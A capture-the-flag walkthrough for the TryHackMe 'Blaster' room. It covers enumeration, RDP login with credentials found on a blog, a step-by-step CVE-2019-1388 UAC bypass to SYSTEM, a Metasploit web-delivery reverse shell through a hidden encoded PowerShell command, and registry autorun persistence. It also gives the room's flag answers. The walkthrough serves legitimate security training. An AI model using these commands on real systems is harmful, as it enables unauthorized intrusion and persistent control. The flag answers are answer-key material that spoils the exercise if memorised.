Blaster - TryHackMe Walkthrough

Room Overview: Blaster is a beginner-friendly Windows exploitation challenge that focuses on bypassing User Account Control (UAC) to achieve privilege escalation. This room teaches web application enumeration, credential discovery, RDP exploitation, and the exploitation of CVE-2019-1388 for privilege escalation.

Skills Required: Basic knowledge of Nmap, directory enumeration tools, understanding of RDP, Metasploit basics

Skills Learned: Web enumeration, credential hunting, Windows UAC bypass, privilege escalation, Metasploit web delivery, establishing persistence

Task 1: Mission Start

This room is a sequel to the "Ice" room and explores alternative exploitation methods beyond the typical Metasploit-heavy approach. We'll be using tools like Nmap and Gobuster for enumeration, then pivoting to Metasploit for persistence at the end.

Note: This is a Windows machine, so give it 3-5 minutes to fully boot up before beginning enumeration.

Task 2: Reconnaissance and Enumeration

Port Scanning

Let's begin with a standard Nmap scan to identify open ports and services:

nmap -sV [TARGET_IP]

Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for [TARGET_IP] Host is up (0.00067s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 3389/tcp open ms-wbt-server Microsoft Terminal Services Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds

Question: How many ports are open on our target system?

Answer: 2

Key Findings:

Port 80: HTTP (Microsoft IIS 10.0)
Port 3389: RDP (Remote Desktop Protocol)

Web Server Enumeration

Let's navigate to the web server and see what we find:

firefox http://[TARGET_IP]

Question: What is the title of the page we discover when browsing to it?

Answer: IIS Windows Server

We see the default IIS welcome page. Time to dig deeper with directory enumeration.

Directory Fuzzing

Using Gobuster to discover hidden directories:

gobuster dir -u http://[TARGET_IP] -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 64

=============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://[TARGET_IP]/ [+] Method: GET [+] Threads: 64 [+] Wordlist: directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /retro (Status: 301) [Size: 144] [--> http://[TARGET_IP]/retro/] Progress: 87664 / 87665 (100.00%) =============================================================== Finished ===============================================================

Question: What hidden directory do we discover?

Answer: /retro

Discovering Credentials

Navigate to the /retro directory. We find a blog! Looking through the posts and comments, we discover some interesting information.

Question: What potential username do we discover?

Answer: Wade

After examining the blog posts, particularly the "Ready Player One" post and its comments, we find a potential password left in the comments.

Question: What possible password do we discover?

Answer: parzival

Remote Desktop Access

Now that we have credentials, let's connect via RDP using xfreerdp:

xfreerdp /u:wade /p:parzival /v:[TARGET_IP] /dynamic-resolution +clipboard

Successfully connected! On Wade's desktop, we find the user flag.

Question: What are the contents of user.txt?

Answer: THM{HACK_PLAYER_ONE}

Task 3: Privilege Escalation via UAC Bypass

Now comes the interesting part - escalating our privileges from a standard user to SYSTEM by exploiting a UAC bypass vulnerability.

Finding the Vulnerability

Looking around Wade's desktop and browsing history, we discover research about a specific CVE.

Question: What CVE was researched on this server?

Answer: CVE-2019-1388

What is CVE-2019-1388?

This is a Windows Certificate Dialog Elevation of Privilege vulnerability with a severity score of 7.8 (HIGH). The vulnerability exists when the Windows Certificate Dialog does not properly enforce user privileges, allowing an unprivileged user to launch a browser as SYSTEM through a clever exploitation technique.

Locating the Exploit

Check the Recycle Bin on the desktop. Inside, you'll find an executable file.

Question: What is the name of this executable?

Answer: hhupd

Exploiting CVE-2019-1388

Before exploitation, let's verify our current privilege level:

whoami
whoami /groups

retroweb\wade

We're currently an unprivileged user. Now let's exploit the vulnerability:

Step-by-step exploitation process:

Restore hhupd.exe from the Recycle Bin to the Desktop
Right-click and run hhupd.exe
Click "Show more details" on the UAC prompt
Click "Show information about the publisher's certificate"
In the Certificate window, click the "Issued by" link (VeriSign Commercial Software Publishers CA)
This opens Internet Explorer. The page will fail to load - this is expected
Click the gear icon (⚙️) in the top right corner
Select File → Save as...
You'll get an error "Location is not available" - click OK
In the file path bar, type: c:\windows\system32\*.* and press ENTER
Scroll down and find cmd.exe
Right-click cmd.exe and select "Open"

A command prompt should open. Let's verify our privilege level:

whoami

nt authority\system

Question: What is the output of running whoami?

Answer: nt authority\system

Success! We now have SYSTEM-level privileges. Let's also check our group memberships:

whoami /groups

Important: Keep this elevated command prompt open for the next task. Do not close it!

Capturing the Root Flag

Navigate to the Administrator's desktop and read the root flag:

cd C:\Users\Administrator\Desktop
type root.txt

Question: What are the contents of root.txt?

Answer: THM{COIN_OPERATED_EXPLOITATION}

Task 4: Establishing Persistence with Metasploit

Now that we've compromised the target, let's establish persistence using Metasploit's web delivery module.

Setting Up Web Delivery

Return to your attack machine and launch Metasploit:

msfconsole -q
use exploit/multi/script/web_delivery

Configuring the Exploit

Check available targets:

show targets

Exploit targets: ================= Id Name -- ---- => 0 Python 1 PHP 2 PSH 3 Regsvr32 4 pubprn 5 SyncAppvPublishingServer 6 PSH (Binary) 7 Linux 8 Mac OS X

Question: Which target number is PSH (PowerShell)?

Answer: 2

Configure the exploit:

set target 2
set LHOST [YOUR_ATTACKER_IP]
set LPORT 4444
set payload windows/meterpreter/reverse_http
run -j

[*] Exploit running as background job 0. [*] Started HTTP reverse handler on http://[YOUR_IP]:4444 [*] Using URL: http://[YOUR_IP]:8080/[RANDOM_STRING] [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -e [BASE64_ENCODED_COMMAND]

Executing the Payload

Copy the PowerShell command from the Metasploit output and paste it into the SYSTEM command prompt on the target machine that we kept open from Task 3.

After a moment, you should see a Meterpreter session open on your attacker machine:

[*] Sending stage (203846 bytes) to [TARGET_IP] [*] Meterpreter session 1 opened ([ATTACKER_IP]:4444 -> [TARGET_IP]:49xxx)

Interacting with Meterpreter

sessions -i 1
getuid
pwd

Server username: NT AUTHORITY\SYSTEM C:\Users\Administrator\Desktop

Setting Up Persistence

Now let's establish persistence so our access survives reboots:

Question: What command can we run to setup persistence which automatically starts when the system boots?

Answer: run persistence -X

Note: The run persistence command is deprecated in newer versions of Metasploit. Instead, background your session and use the exploit module:

background
use exploit/windows/local/persistence
set SESSION 1
run

[*] Running persistent module against RETROWEB via session ID: 1 [+] Persistent VBS script written on RETROWEB to C:\Windows\TEMP\[RANDOM].vbs [*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[RANDOM] [+] Installed autorun on RETROWEB [*] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/RETROWEB_[DATE]/RETROWEB_[DATE].rc

The persistence mechanism has been successfully installed! This creates a VBS script that will automatically execute on system startup, establishing a reverse connection back to your attack machine.

Conclusion

Congratulations! You've successfully completed the Blaster room. Throughout this walkthrough, you've learned several critical skills:

Web application enumeration and directory fuzzing
Credential discovery through OSINT techniques
RDP access to Windows systems
Windows UAC bypass exploitation (CVE-2019-1388)
Privilege escalation from standard user to SYSTEM
Establishing remote access with Metasploit web delivery
Creating persistence mechanisms for maintaining access

Key Takeaway: CVE-2019-1388 demonstrates how seemingly minor UI interactions in Windows can be chained together to achieve privilege escalation. The vulnerability leverages the Windows Certificate Dialog opening Internet Explorer with SYSTEM privileges, then uses the "Save As" dialog to access system files including cmd.exe. This creative exploitation technique highlights why defense-in-depth is crucial - a single weakness in the security chain can compromise the entire system.

This room is part of a series including "Ice" (the prequel) and "Retro" (a more challenging version). If you enjoyed this challenge, check out those rooms for additional Windows exploitation practice.

[ UAC BYPASSED ] - [ SYSTEM ACCESS ACHIEVED ] - [ PERSISTENCE ESTABLISHED ]

Tags: #walkthrough